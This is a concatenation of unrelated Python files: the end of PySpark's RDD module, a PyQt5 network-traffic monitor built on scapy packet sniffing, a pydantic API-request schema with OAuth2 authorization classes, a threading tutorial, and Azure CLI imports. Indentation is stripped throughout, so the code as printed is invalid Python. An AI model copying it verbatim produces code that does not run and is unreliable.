[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(sock_info, self._jrdd_deserializer)
def barrier(self):
"""
.. note:: Experimental
Marks the current stage as a barrier stage, where Spark must launch all tasks together.
In case of a task failure, instead of only restarting the failed task, Spark will abort the
entire stage and relaunch all tasks for this stage.
The barrier execution mode feature is experimental and it only handles limited scenarios.
Please read the linked SPIP and design docs to understand the limitations and future plans.
:return: an :class:`RDDBarrier` instance that provides actions within a barrier stage.
.. seealso:: :class:`BarrierTaskContext`
.. seealso:: `SPIP: Barrier Execution Mode
<http://jira.apache.org/jira/browse/SPARK-24374>`_
.. seealso:: `Design Doc <https://jira.apache.org/jira/browse/SPARK-24582>`_
.. versionadded:: 2.4.0
"""
return RDDBarrier(self)
def _is_barrier(self):
"""
Whether this RDD is in a barrier stage.
"""
return self._jrdd.rdd().isBarrier()
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class RDDBarrier(object):
"""
.. note:: Experimental
Wraps an RDD in a barrier stage, which forces Spark to launch tasks of this stage together.
:class:`RDDBarrier` instances are created by :func:`RDD.barrier`.
.. versionadded:: 2.4.0
"""
def __init__(self, rdd):
self.rdd = rdd
def mapPartitions(self, f, preservesPartitioning=False):
"""
.. note:: Experimental
Returns a new RDD by applying a function to each partition of the wrapped RDD,
where tasks are launched together in a barrier stage.
The interface is the same as :func:`RDD.mapPartitions`.
Please see the API doc there.
.. versionadded:: 2.4.0
"""
def func(s, iterator):
return f(iterator)
return PipelinedRDD(self.rdd, func, preservesPartitioning, isFromBarrier=True)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False, isFromBarrier=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
self.is_barrier = prev._is_barrier() or isFromBarrier
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning, self.is_barrier)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _is_barrier(self):
return self.is_barrier
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
network_monitor_4.1beta.py
|
# -*- coding: utf-8 -*-
from PyQt5.QtWidgets import * # PyQt5
from PyQt5.QtCore import QThread, pyqtSignal, Qt # 多线程,以及多线程之间传递信号
from PyQt5.QtChart import QChartView, QChart, QBarSet, QHorizontalBarSeries, QBarCategoryAxis
from network_monitor_no_gui import *
from ui_Main_Window import * # ui 文件导出的窗体界面
import multiprocessing
SNIFF_INTERVAL = 0.5 # 一次抓包的时间
PLOT_NUMBER = 5 # 一张图上绘制的组数
# 将数据调整为合适的单位
def speed2str(speed):
unit = ['', 'K', 'M', 'G', 'T']
_i = 0
while speed >= 1000:
speed /= 1024
_i = _i + 1
base = pow(1024, _i)
return unit[_i], base
# 数据统计图 类
class FlowChart(QChart):
def __init__(self, main_ui):
super(QChart, self).__init__()
self.main_ui = main_ui
# 设置标题
# self.setTitle('Simple horizontal barchart example')
# 开启动画效果
# self.setAnimationOptions(QChart.SeriesAnimations)
width = self.main_ui.graphics_view.width()
height = self.main_ui.graphics_view.height()
self.resize(width, height)
def draw(self):
# 通过 UI 单选框的状态判断选项
if self.main_ui.radio_ip.isChecked():
plotCategory = 'IP'
else:
plotCategory = 'protocol'
if self.main_ui.radio_packet.isChecked():
plotUnit = 'packet'
else:
plotUnit = 'length'
# 根据选项调整 sql 查询语法
sql = '''
SELECT {0}, upload_{1} AS upload, download_{1} AS download
FROM network_monitor.{0}_upload_download
ORDER BY all_{1} DESC
LIMIT {2};'''
sql = sql.format(plotCategory, plotUnit, PLOT_NUMBER)
sql_values = run_sql_with_result(sql) # 查询结果是 list 里面套 dict
try:
sql_values.reverse() # 如果 except 说明 sql_values 为空
except:
self.removeAllSeries() # 删除掉已经绘制的图像
return
if plotUnit == 'length': # 如果按包大小绘图,为了美观,需要调整单位和用于绘图的数据
max_value = 0
for i in sql_values:
for j in ['download', 'upload']:
max_value = max(max_value, i[j])
(unit, base) = speed2str(max_value)
for i in sql_values:
for j in ['download', 'upload']:
i[j] /= base
unit_str = ',单位:' + unit + 'B'
else:
unit_str = ',单位:包'
# 每组创建两个柱状条
set0 = QBarSet('下载' + unit_str)
set1 = QBarSet('上传' + unit_str)
for i in range(len(sql_values)): # PyQt 的传入数据的语法,估计是跟 C++ 的 Qt 学的
set0 << sql_values[i]['download']
set1 << sql_values[i]['upload']
# 创建横向柱状条
series = QHorizontalBarSeries()
series.append(set0)
series.append(set1)
# 添加Series
self.removeAllSeries()
self.addSeries(series)
# 分类
categories = [x[plotCategory] for x in sql_values]
# 分类 x 轴,注意 x 轴在横向柱状图中是竖着的轴
axis = QBarCategoryAxis()
axis.append(categories)
# 创建默认轴线
self.createDefaultAxes()
# 替换默认y轴
self.setAxisY(axis, series)
# 显示图例
# 显示图例
self.legend().setVisible(True)
self.legend().setAlignment(Qt.AlignBottom)
def update(self):
# 修改 Chart 大小为外层 graphics_view 大小
width = self.main_ui.graphics_view.width() - 10
height = self.main_ui.graphics_view.height() - 10
# self.main_ui.graphics_view.setSceneRect(self.main_ui.graphics_scene.sceneRect())
# self.main_ui.graphics_scene.setSceneRect(self.main_ui.graphics_view.sceneRect())
self.resize(width, height)
self.draw()
def sniffProcess(q, iface):
packets = sniff(iface=iface, timeout=SNIFF_INTERVAL)
packet_length = data_process(packets)
q.put(packet_length) # 多进程中数据用 multiprocessing.Queue 交互
# 业务核心线程,控制了抓包线程和数据处理线程
class CoreThread(QThread):
trigger = pyqtSignal(int)
# 初始化函数
def __init__(self, main_ui):
super(CoreThread, self).__init__()
self.main_ui = main_ui
self.iface = ''
self.userIP = ''
self.sniff_thread = None
self.data_process_thread = None
self.plot_thread = None
self.trigger.connect(self.main_ui.update_plot)
# 重写线程执行的run函数
def run(self):
# 初始化数据库
# init_database(self.userIP)
# plt.ion()
while True:
# 检测监测网卡是否有变化,如果变化则(重新)初始化数据库
network_info_str = self.main_ui.combo_interface.currentText()
network_info = network_info_str.strip('][').replace('\'', '').split(', ')
if network_info[0] != self.iface:
self.iface = network_info[0]
self.userIP = network_info[1]
init_database(self.userIP)
queue = multiprocessing.Queue()
process = multiprocessing.Process(target=sniffProcess, args=(queue, self.iface))
process.start()
if ~queue.empty():
self.trigger.emit(queue.get())
time.sleep(SNIFF_INTERVAL)
# Qt 的 main_ui
class NetworkMonitorMainUI(QMainWindow, Ui_MainWindow):
def __init__(self, parent=None):
super(NetworkMonitorMainUI, self).__init__(parent)
self.setupUi(self)
self.chart = FlowChart(self)
print("hello")
# 四个单选框的信号与槽,将单击单选框行为和对应函数关联起来
self.radio_ip.clicked.connect(self.radio_button_ip_click)
self.radio_protocol.clicked.connect(self.radio_button_protocol_click)
self.radio_packet.clicked.connect(self.radio_button_packet_click)
self.radio_length.clicked.connect(self.radio_button_length_click)
# 设置选择网卡的下拉菜单栏
for i in get_network_info():
self.combo_interface.addItem(str(i))
# 创建核心线程并启动
self.core_thread = CoreThread(self)
self.core_thread.start()
# Qt 的逻辑是 graphics_view 是一个控件
# graphics_view 套一个 graphics_scene
# graphics_scene 套一个 widget,如 QChart
self.graphics_scene = QGraphicsScene()
# self.graphics_scene.setMinimumRenderSize(3)
# scene.setSceneRect(self.graphics_view.sceneRect())
self.graphics_scene.addItem(self.chart)
self.graphics_view.setScene(self.graphics_scene)
# 单击对应单选框后触发的四个函数
def radio_button_ip_click(self):
self.radio_protocol.setChecked(False) # 将另外一个按钮置零
def radio_button_protocol_click(self):
self.radio_ip.setChecked(False)
def radio_button_packet_click(self):
self.radio_length.setChecked(False)
def radio_button_length_click(self):
self.radio_packet.setChecked(False)
def update_plot(self, packet_length):
# 显示速度
current_net_speed = packet_length / SNIFF_INTERVAL
(unit_str, base) = speed2str(current_net_speed)
current_net_speed /= base
current_net_speed_str = '当前速度:' + '%.2f' % current_net_speed + unit_str + 'B/s'
self.netspeed_label.setText(current_net_speed_str)
# 更新图表
self.chart.update()
if __name__ == '__main__':
app = QApplication(sys.argv)
main_ui = NetworkMonitorMainUI()
main_ui.show()
sys.exit(app.exec_())
|
defs.py
|
"""Strong typed schema definition."""
import http.server
import json
import random
import re
import socket
import socketserver
import string
from base64 import b64encode
from enum import Enum
from pathlib import Path
from threading import Thread
from time import time
from typing import Any, Dict, List, Optional, Set, Union
from urllib.parse import parse_qs, urlparse
from jinja2 import Environment, meta
from pydantic import Field, root_validator
from ...utils import is_notebook
from ..errors import InvalidAuthParams, MissingRequiredAuthParams
from ..utils import Request
from .base import BaseDef, BaseDefT
# pylint: disable=missing-class-docstring,missing-function-docstring,invalid-name
FILE_PATH: Path = Path(__file__).resolve().parent
with open(f"{FILE_PATH}/oauth2.html", "rb") as f:
OAUTH2_TEMPLATE = f.read()
def get_random_string(length: int) -> str:
letters = string.ascii_lowercase
result_str = "".join(random.choice(letters) for _ in range(length))
return result_str
def validate_auth(required: Set[str], passed: Dict[str, Any]) -> None:
required_not_passed = required - passed.keys()
passed_not_required = passed.keys() - required
if required_not_passed:
raise MissingRequiredAuthParams(required_not_passed)
if passed_not_required:
raise InvalidAuthParams(passed_not_required)
class OffsetPaginationDef(BaseDef):
type: str = Field("offset", const=True)
max_count: int
limit_key: str
offset_key: str
class SeekPaginationDef(BaseDef):
type: str = Field("seek", const=True)
max_count: int
limit_key: str
seek_id: str
seek_key: str
class PagePaginationDef(BaseDef):
type: str = Field("page", const=True)
max_count: int
limit_key: str
page_key: str
class TokenLocation(str, Enum):
Header = "header"
Body = "body"
class TokenPaginationDef(BaseDef):
type: str = Field("token", const=True)
max_count: int
limit_key: str
token_location: TokenLocation
token_accessor: str
token_key: str
PaginationDef = Union[OffsetPaginationDef, SeekPaginationDef, PagePaginationDef, TokenPaginationDef]
class FieldDef(BaseDef):
required: bool
from_key: Union[List[str], str, None]
to_key: Optional[str]
template: Optional[str]
remove_if_empty: bool
@root_validator(pre=True)
# pylint: disable=no-self-argument,no-self-use
def from_key_validation(cls, values: Dict[str, Any]) -> Any:
if "template" in values:
parsed_content = Environment().parse(values["template"])
variables = meta.find_undeclared_variables(parsed_content) # type: ignore
from_key = values.get("fromKey")
if isinstance(from_key, str):
from_key = {from_key}
elif from_key is None:
from_key = set()
elif isinstance(from_key, list):
from_key = set(from_key)
else:
raise NotImplementedError("Unreachable")
if len(set(variables) - from_key) != 0:
raise ValueError(f"template requires {variables} exist in fromKey, got {from_key}")
else:
if isinstance(values.get("fromKey"), list):
raise ValueError("from_key cannot be a list if template is not used.")
return values
FieldDefUnion = Union[FieldDef, bool, str] # Put bool before str
class TCPServer(socketserver.TCPServer):
def server_bind(self) -> None:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class HTTPServer(http.server.BaseHTTPRequestHandler):
def do_GET(self) -> None: # pylint: disable=invalid-name
# pylint: disable=protected-access
query = urlparse(self.path).query
parsed = parse_qs(query)
(code,) = parsed["code"]
(state,) = parsed["state"]
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(OAUTH2_TEMPLATE)
Thread(target=self.server.shutdown).start()
# Hacky way to pass data out
self.server._oauth2_code = code # type: ignore
self.server._oauth2_state = state # type: ignore
def log_request(self, code: Union[str, int] = "-", size: Union[str, int] = "-") -> None:
pass
class OAuth2AuthorizationCodeAuthorizationDef(BaseDef):
type: str = Field("OAuth2", const=True)
grant_type: str = Field("AuthorizationCode", const=True)
scopes: List[str]
auth_server_url: str
token_server_url: str
def build(
self,
req_data: Dict[str, Any],
params: Dict[str, Any],
storage: Optional[Dict[str, Any]] = None,
) -> None:
if storage is None:
raise ValueError("storage is required for OAuth2")
if "access_token" not in storage or storage.get("expires_at", 0) < time():
port = params.get("port", 9999)
code = self._auth(params["client_id"], port)
validate_auth({"client_id", "client_secret"}, params)
ckey = params["client_id"]
csecret = params["client_secret"]
b64cred = b64encode(f"{ckey}:{csecret}".encode("ascii")).decode()
headers = {
"Authorization": f"Basic {b64cred}",
"Content-Type": "application/x-www-form-urlencoded",
}
params = {
"grant_type": "authorization_code",
"code": code,
"redirect_uri": f"http://localhost:{port}/",
}
requests = Request(self.token_server_url)
response = requests.post(_headers=headers, _data=params)
resp: Dict[str, Any] = json.loads(response.read())
if resp["token_type"].lower() != "bearer":
raise RuntimeError("token_type is not bearer")
access_token = resp["access_token"]
storage["access_token"] = access_token
if "expires_in" in resp:
storage["expires_at"] = (
time() + resp["expires_in"] - 60
) # 60 seconds grace period to avoid clock lag
req_data["headers"]["Authorization"] = f"Bearer {storage['access_token']}"
def _auth(self, client_id: str, port: int = 9999) -> str:
# pylint: disable=protected-access
state = get_random_string(23)
scope = ",".join(self.scopes)
authurl = (
f"{self.auth_server_url}?"
f"response_type=code&client_id={client_id}&"
f"redirect_uri=http%3A%2F%2Flocalhost:{port}/&scope={scope}&"
f"state={state}"
)
if is_notebook():
from IPython.display import ( # pylint: disable=import-outside-toplevel
Javascript,
display,
)
display(Javascript(f"window.open('{authurl}');"))
else:
import webbrowser # pylint: disable=import-outside-toplevel
webbrowser.open_new_tab(authurl)
with TCPServer(("", 9999), HTTPServer) as httpd:
try:
httpd.serve_forever()
finally:
httpd.server_close()
if httpd._oauth2_state != state: # type: ignore
raise RuntimeError("OAuth2 state does not match")
if httpd._oauth2_code is None: # type: ignore
raise RuntimeError("OAuth2 authorization code auth failed, no code acquired.")
return httpd._oauth2_code # type: ignore
class OAuth2ClientCredentialsAuthorizationDef(BaseDef):
type: str = Field("OAuth2", const=True)
grant_type: str = Field("ClientCredentials", const=True)
token_server_url: str
def build(
self,
req_data: Dict[str, Any],
params: Dict[str, Any],
storage: Optional[Dict[str, Any]] = None,
) -> None:
if storage is None:
raise ValueError("storage is required for OAuth2")
if "access_token" not in storage or storage.get("expires_at", 0) < time():
validate_auth({"client_id", "client_secret"}, params)
# Not yet authorized
ckey = params["client_id"]
csecret = params["client_secret"]
b64cred = b64encode(f"{ckey}:{csecret}".encode("ascii")).decode()
headers = {
"Authorization": f"Basic {b64cred}",
"Content-Type": "application/x-www-form-urlencoded",
}
params = {"grant_type": "client_credentials"}
requests = Request(self.token_server_url)
response = requests.post(_headers=headers, _data=params)
resp: Dict[str, Any] = json.loads(response.read())
if resp["token_type"].lower() != "bearer":
raise RuntimeError("token_type is not bearer")
access_token = resp["access_token"]
storage["access_token"] = access_token
if "expires_in" in resp:
storage["expires_at"] = (
time() + resp["expires_in"] - 60
) # 60 seconds grace period to avoid clock lag
req_data["headers"]["Authorization"] = f"Bearer {storage['access_token']}"
class QueryParamAuthorizationDef(BaseDef):
type: str = Field("QueryParam", const=True)
key_param: str
def build(
self,
req_data: Dict[str, Any],
params: Dict[str, Any],
storage: Optional[Dict[str, Any]] = None, # pylint: disable=unused-argument
) -> None:
"""Populate some required fields to the request data."""
validate_auth({"access_token"}, params)
req_data["params"][self.key_param] = params["access_token"]
class BearerAuthorizationDef(BaseDef):
type: str = Field("Bearer", const=True)
@staticmethod
def build(
req_data: Dict[str, Any],
params: Dict[str, Any],
storage: Optional[Dict[str, Any]] = None, # pylint: disable=unused-argument
) -> None:
"""Populate some required fields to the request data."""
validate_auth({"access_token"}, params)
req_data["headers"]["Authorization"] = f"Bearer {params['access_token']}"
class HeaderAuthorizationDef(BaseDef):
type: str = Field("Header", const=True)
key_name: str
extra: Dict[str, str] = Field(default_factory=dict)
def build(
self,
req_data: Dict[str, Any],
params: Dict[str, Any],
storage: Optional[Dict[str, Any]] = None, # pylint: disable=unused-argument
) -> None:
"""Populate some required fields to the request data."""
validate_auth({"access_token"}, params)
req_data["headers"][self.key_name] = params["access_token"]
req_data["headers"].update(self.extra)
AuthorizationDef = Union[
OAuth2ClientCredentialsAuthorizationDef,
OAuth2AuthorizationCodeAuthorizationDef,
QueryParamAuthorizationDef,
BearerAuthorizationDef,
HeaderAuthorizationDef,
]
class BodyDef(BaseDef):
ctype: str = Field(regex=r"^(application/x-www-form-urlencoded|application/json)$")
content: Dict[str, FieldDefUnion]
class Method(str, Enum):
GET = "GET"
POST = "POST"
PUT = "PUT"
class SearchDef(BaseDef):
key: str
class UrlDef(BaseDef):
url: str
parse: bool = True
skip: Set[str] = Field(default_factory=set)
class RequestDef(BaseDef):
url: Union[str, UrlDef]
method: Method
headers: Optional[Dict[str, FieldDefUnion]]
params: Dict[str, FieldDefUnion]
body: Optional[BodyDef]
cookies: Optional[Dict[str, FieldDefUnion]]
authorization: Optional[AuthorizationDef]
pagination: Optional[PaginationDef]
search: Optional[SearchDef]
def url_path_params(self) -> Set[str]:
if isinstance(self.url, str):
url = self.url
skip: Set[str] = set()
else:
if not self.url.parse:
return set()
url = self.url.url
skip = self.url.skip
ret: Set[str] = set()
for match in re.finditer(r"\{(?P<param>.*?)\}", url):
param = match.group("param")
if param:
ret.add(param)
return ret - skip
def populate_url(self, params: Dict[str, str]) -> str:
if isinstance(self.url, str):
url = self.url
else:
url = self.url.url
if not self.url.parse:
return url
for key, value in params.items():
url = url.replace("{" + key + "}", value)
return url
class SchemaFieldDef(BaseDef):
target: str
type: str
description: Optional[str]
def merge(self, rhs: BaseDefT) -> BaseDefT:
if not isinstance(rhs, SchemaFieldDef):
raise ValueError(f"Cannot merge {type(self)} with {type(rhs)}")
if self.target != rhs.target:
raise ValueError("Cannot merge SchemaFieldDef with different target.")
merged_type = merge_type(self.type, rhs.type)
cur: SchemaFieldDef = self.copy() # type: ignore
cur.type = merged_type
cur.description = rhs.description
return cur # type: ignore
TYPE_TREE = {
"object": None,
"string": None,
"float": "string",
"int": "float",
"boolean": "string",
}
def merge_type(a: str, b: str) -> str: # pylint: disable=invalid-name
if a == b:
return a
aset = {a}
bset = {b}
while True:
aparent = TYPE_TREE[a]
if aparent is not None:
if aparent in bset:
return aparent
else:
aset.add(aparent)
bparent = TYPE_TREE[b]
if bparent is not None:
if bparent in aset:
return bparent
else:
bset.add(bparent)
if aparent is None and bparent is None:
raise RuntimeError("Unreachable")
class ResponseDef(BaseDef):
ctype: str = Field("application/json", const=True)
table_path: str
schema_: Dict[str, SchemaFieldDef] = Field(alias="schema")
orient: str = Field(regex=r"^(records|split)$")
class ConfigDef(BaseDef):
version: int = Field(1, const=True)
request: RequestDef
examples: Optional[Dict[str, str]]
response: ResponseDef
|
mtsleepC.py
|
#!/usr/bin/venv python3
import threading
from time import sleep, ctime
loops = [4, 2]
def loop(nloop, nsec):
print('start loop', nloop, 'at:', ctime())
sleep(nsec)
print('loop', nloop, 'done at:', ctime())
def main():
print('starting at:', ctime())
threads = []
nloops = range(len(loops))
for i in nloops:
# 实例化 Thread(调用 Thread())和调用 thread.start_new_thread() 的最大区别是新线程不会立即开始执行
t = threading.Thread(target=loop, args=(i, loops[i]))
threads.append(t)
for i in nloops:
threads[i].start()
# join()方法将等线程结束,或者在供了超时时间的 情况下,达到超时时间。使用 join()方法要
# 比等释放的无限环更加清晰(这也是这种 又称为自旋锁的原因)。
for i in nloops:
# join()方法只有在需要等线程完成的时候才是有用的。
threads[i].join() # wait for all threads to finish
print('all DONE at:', ctime())
if __name__ == '__main__':
main()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import colorama
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
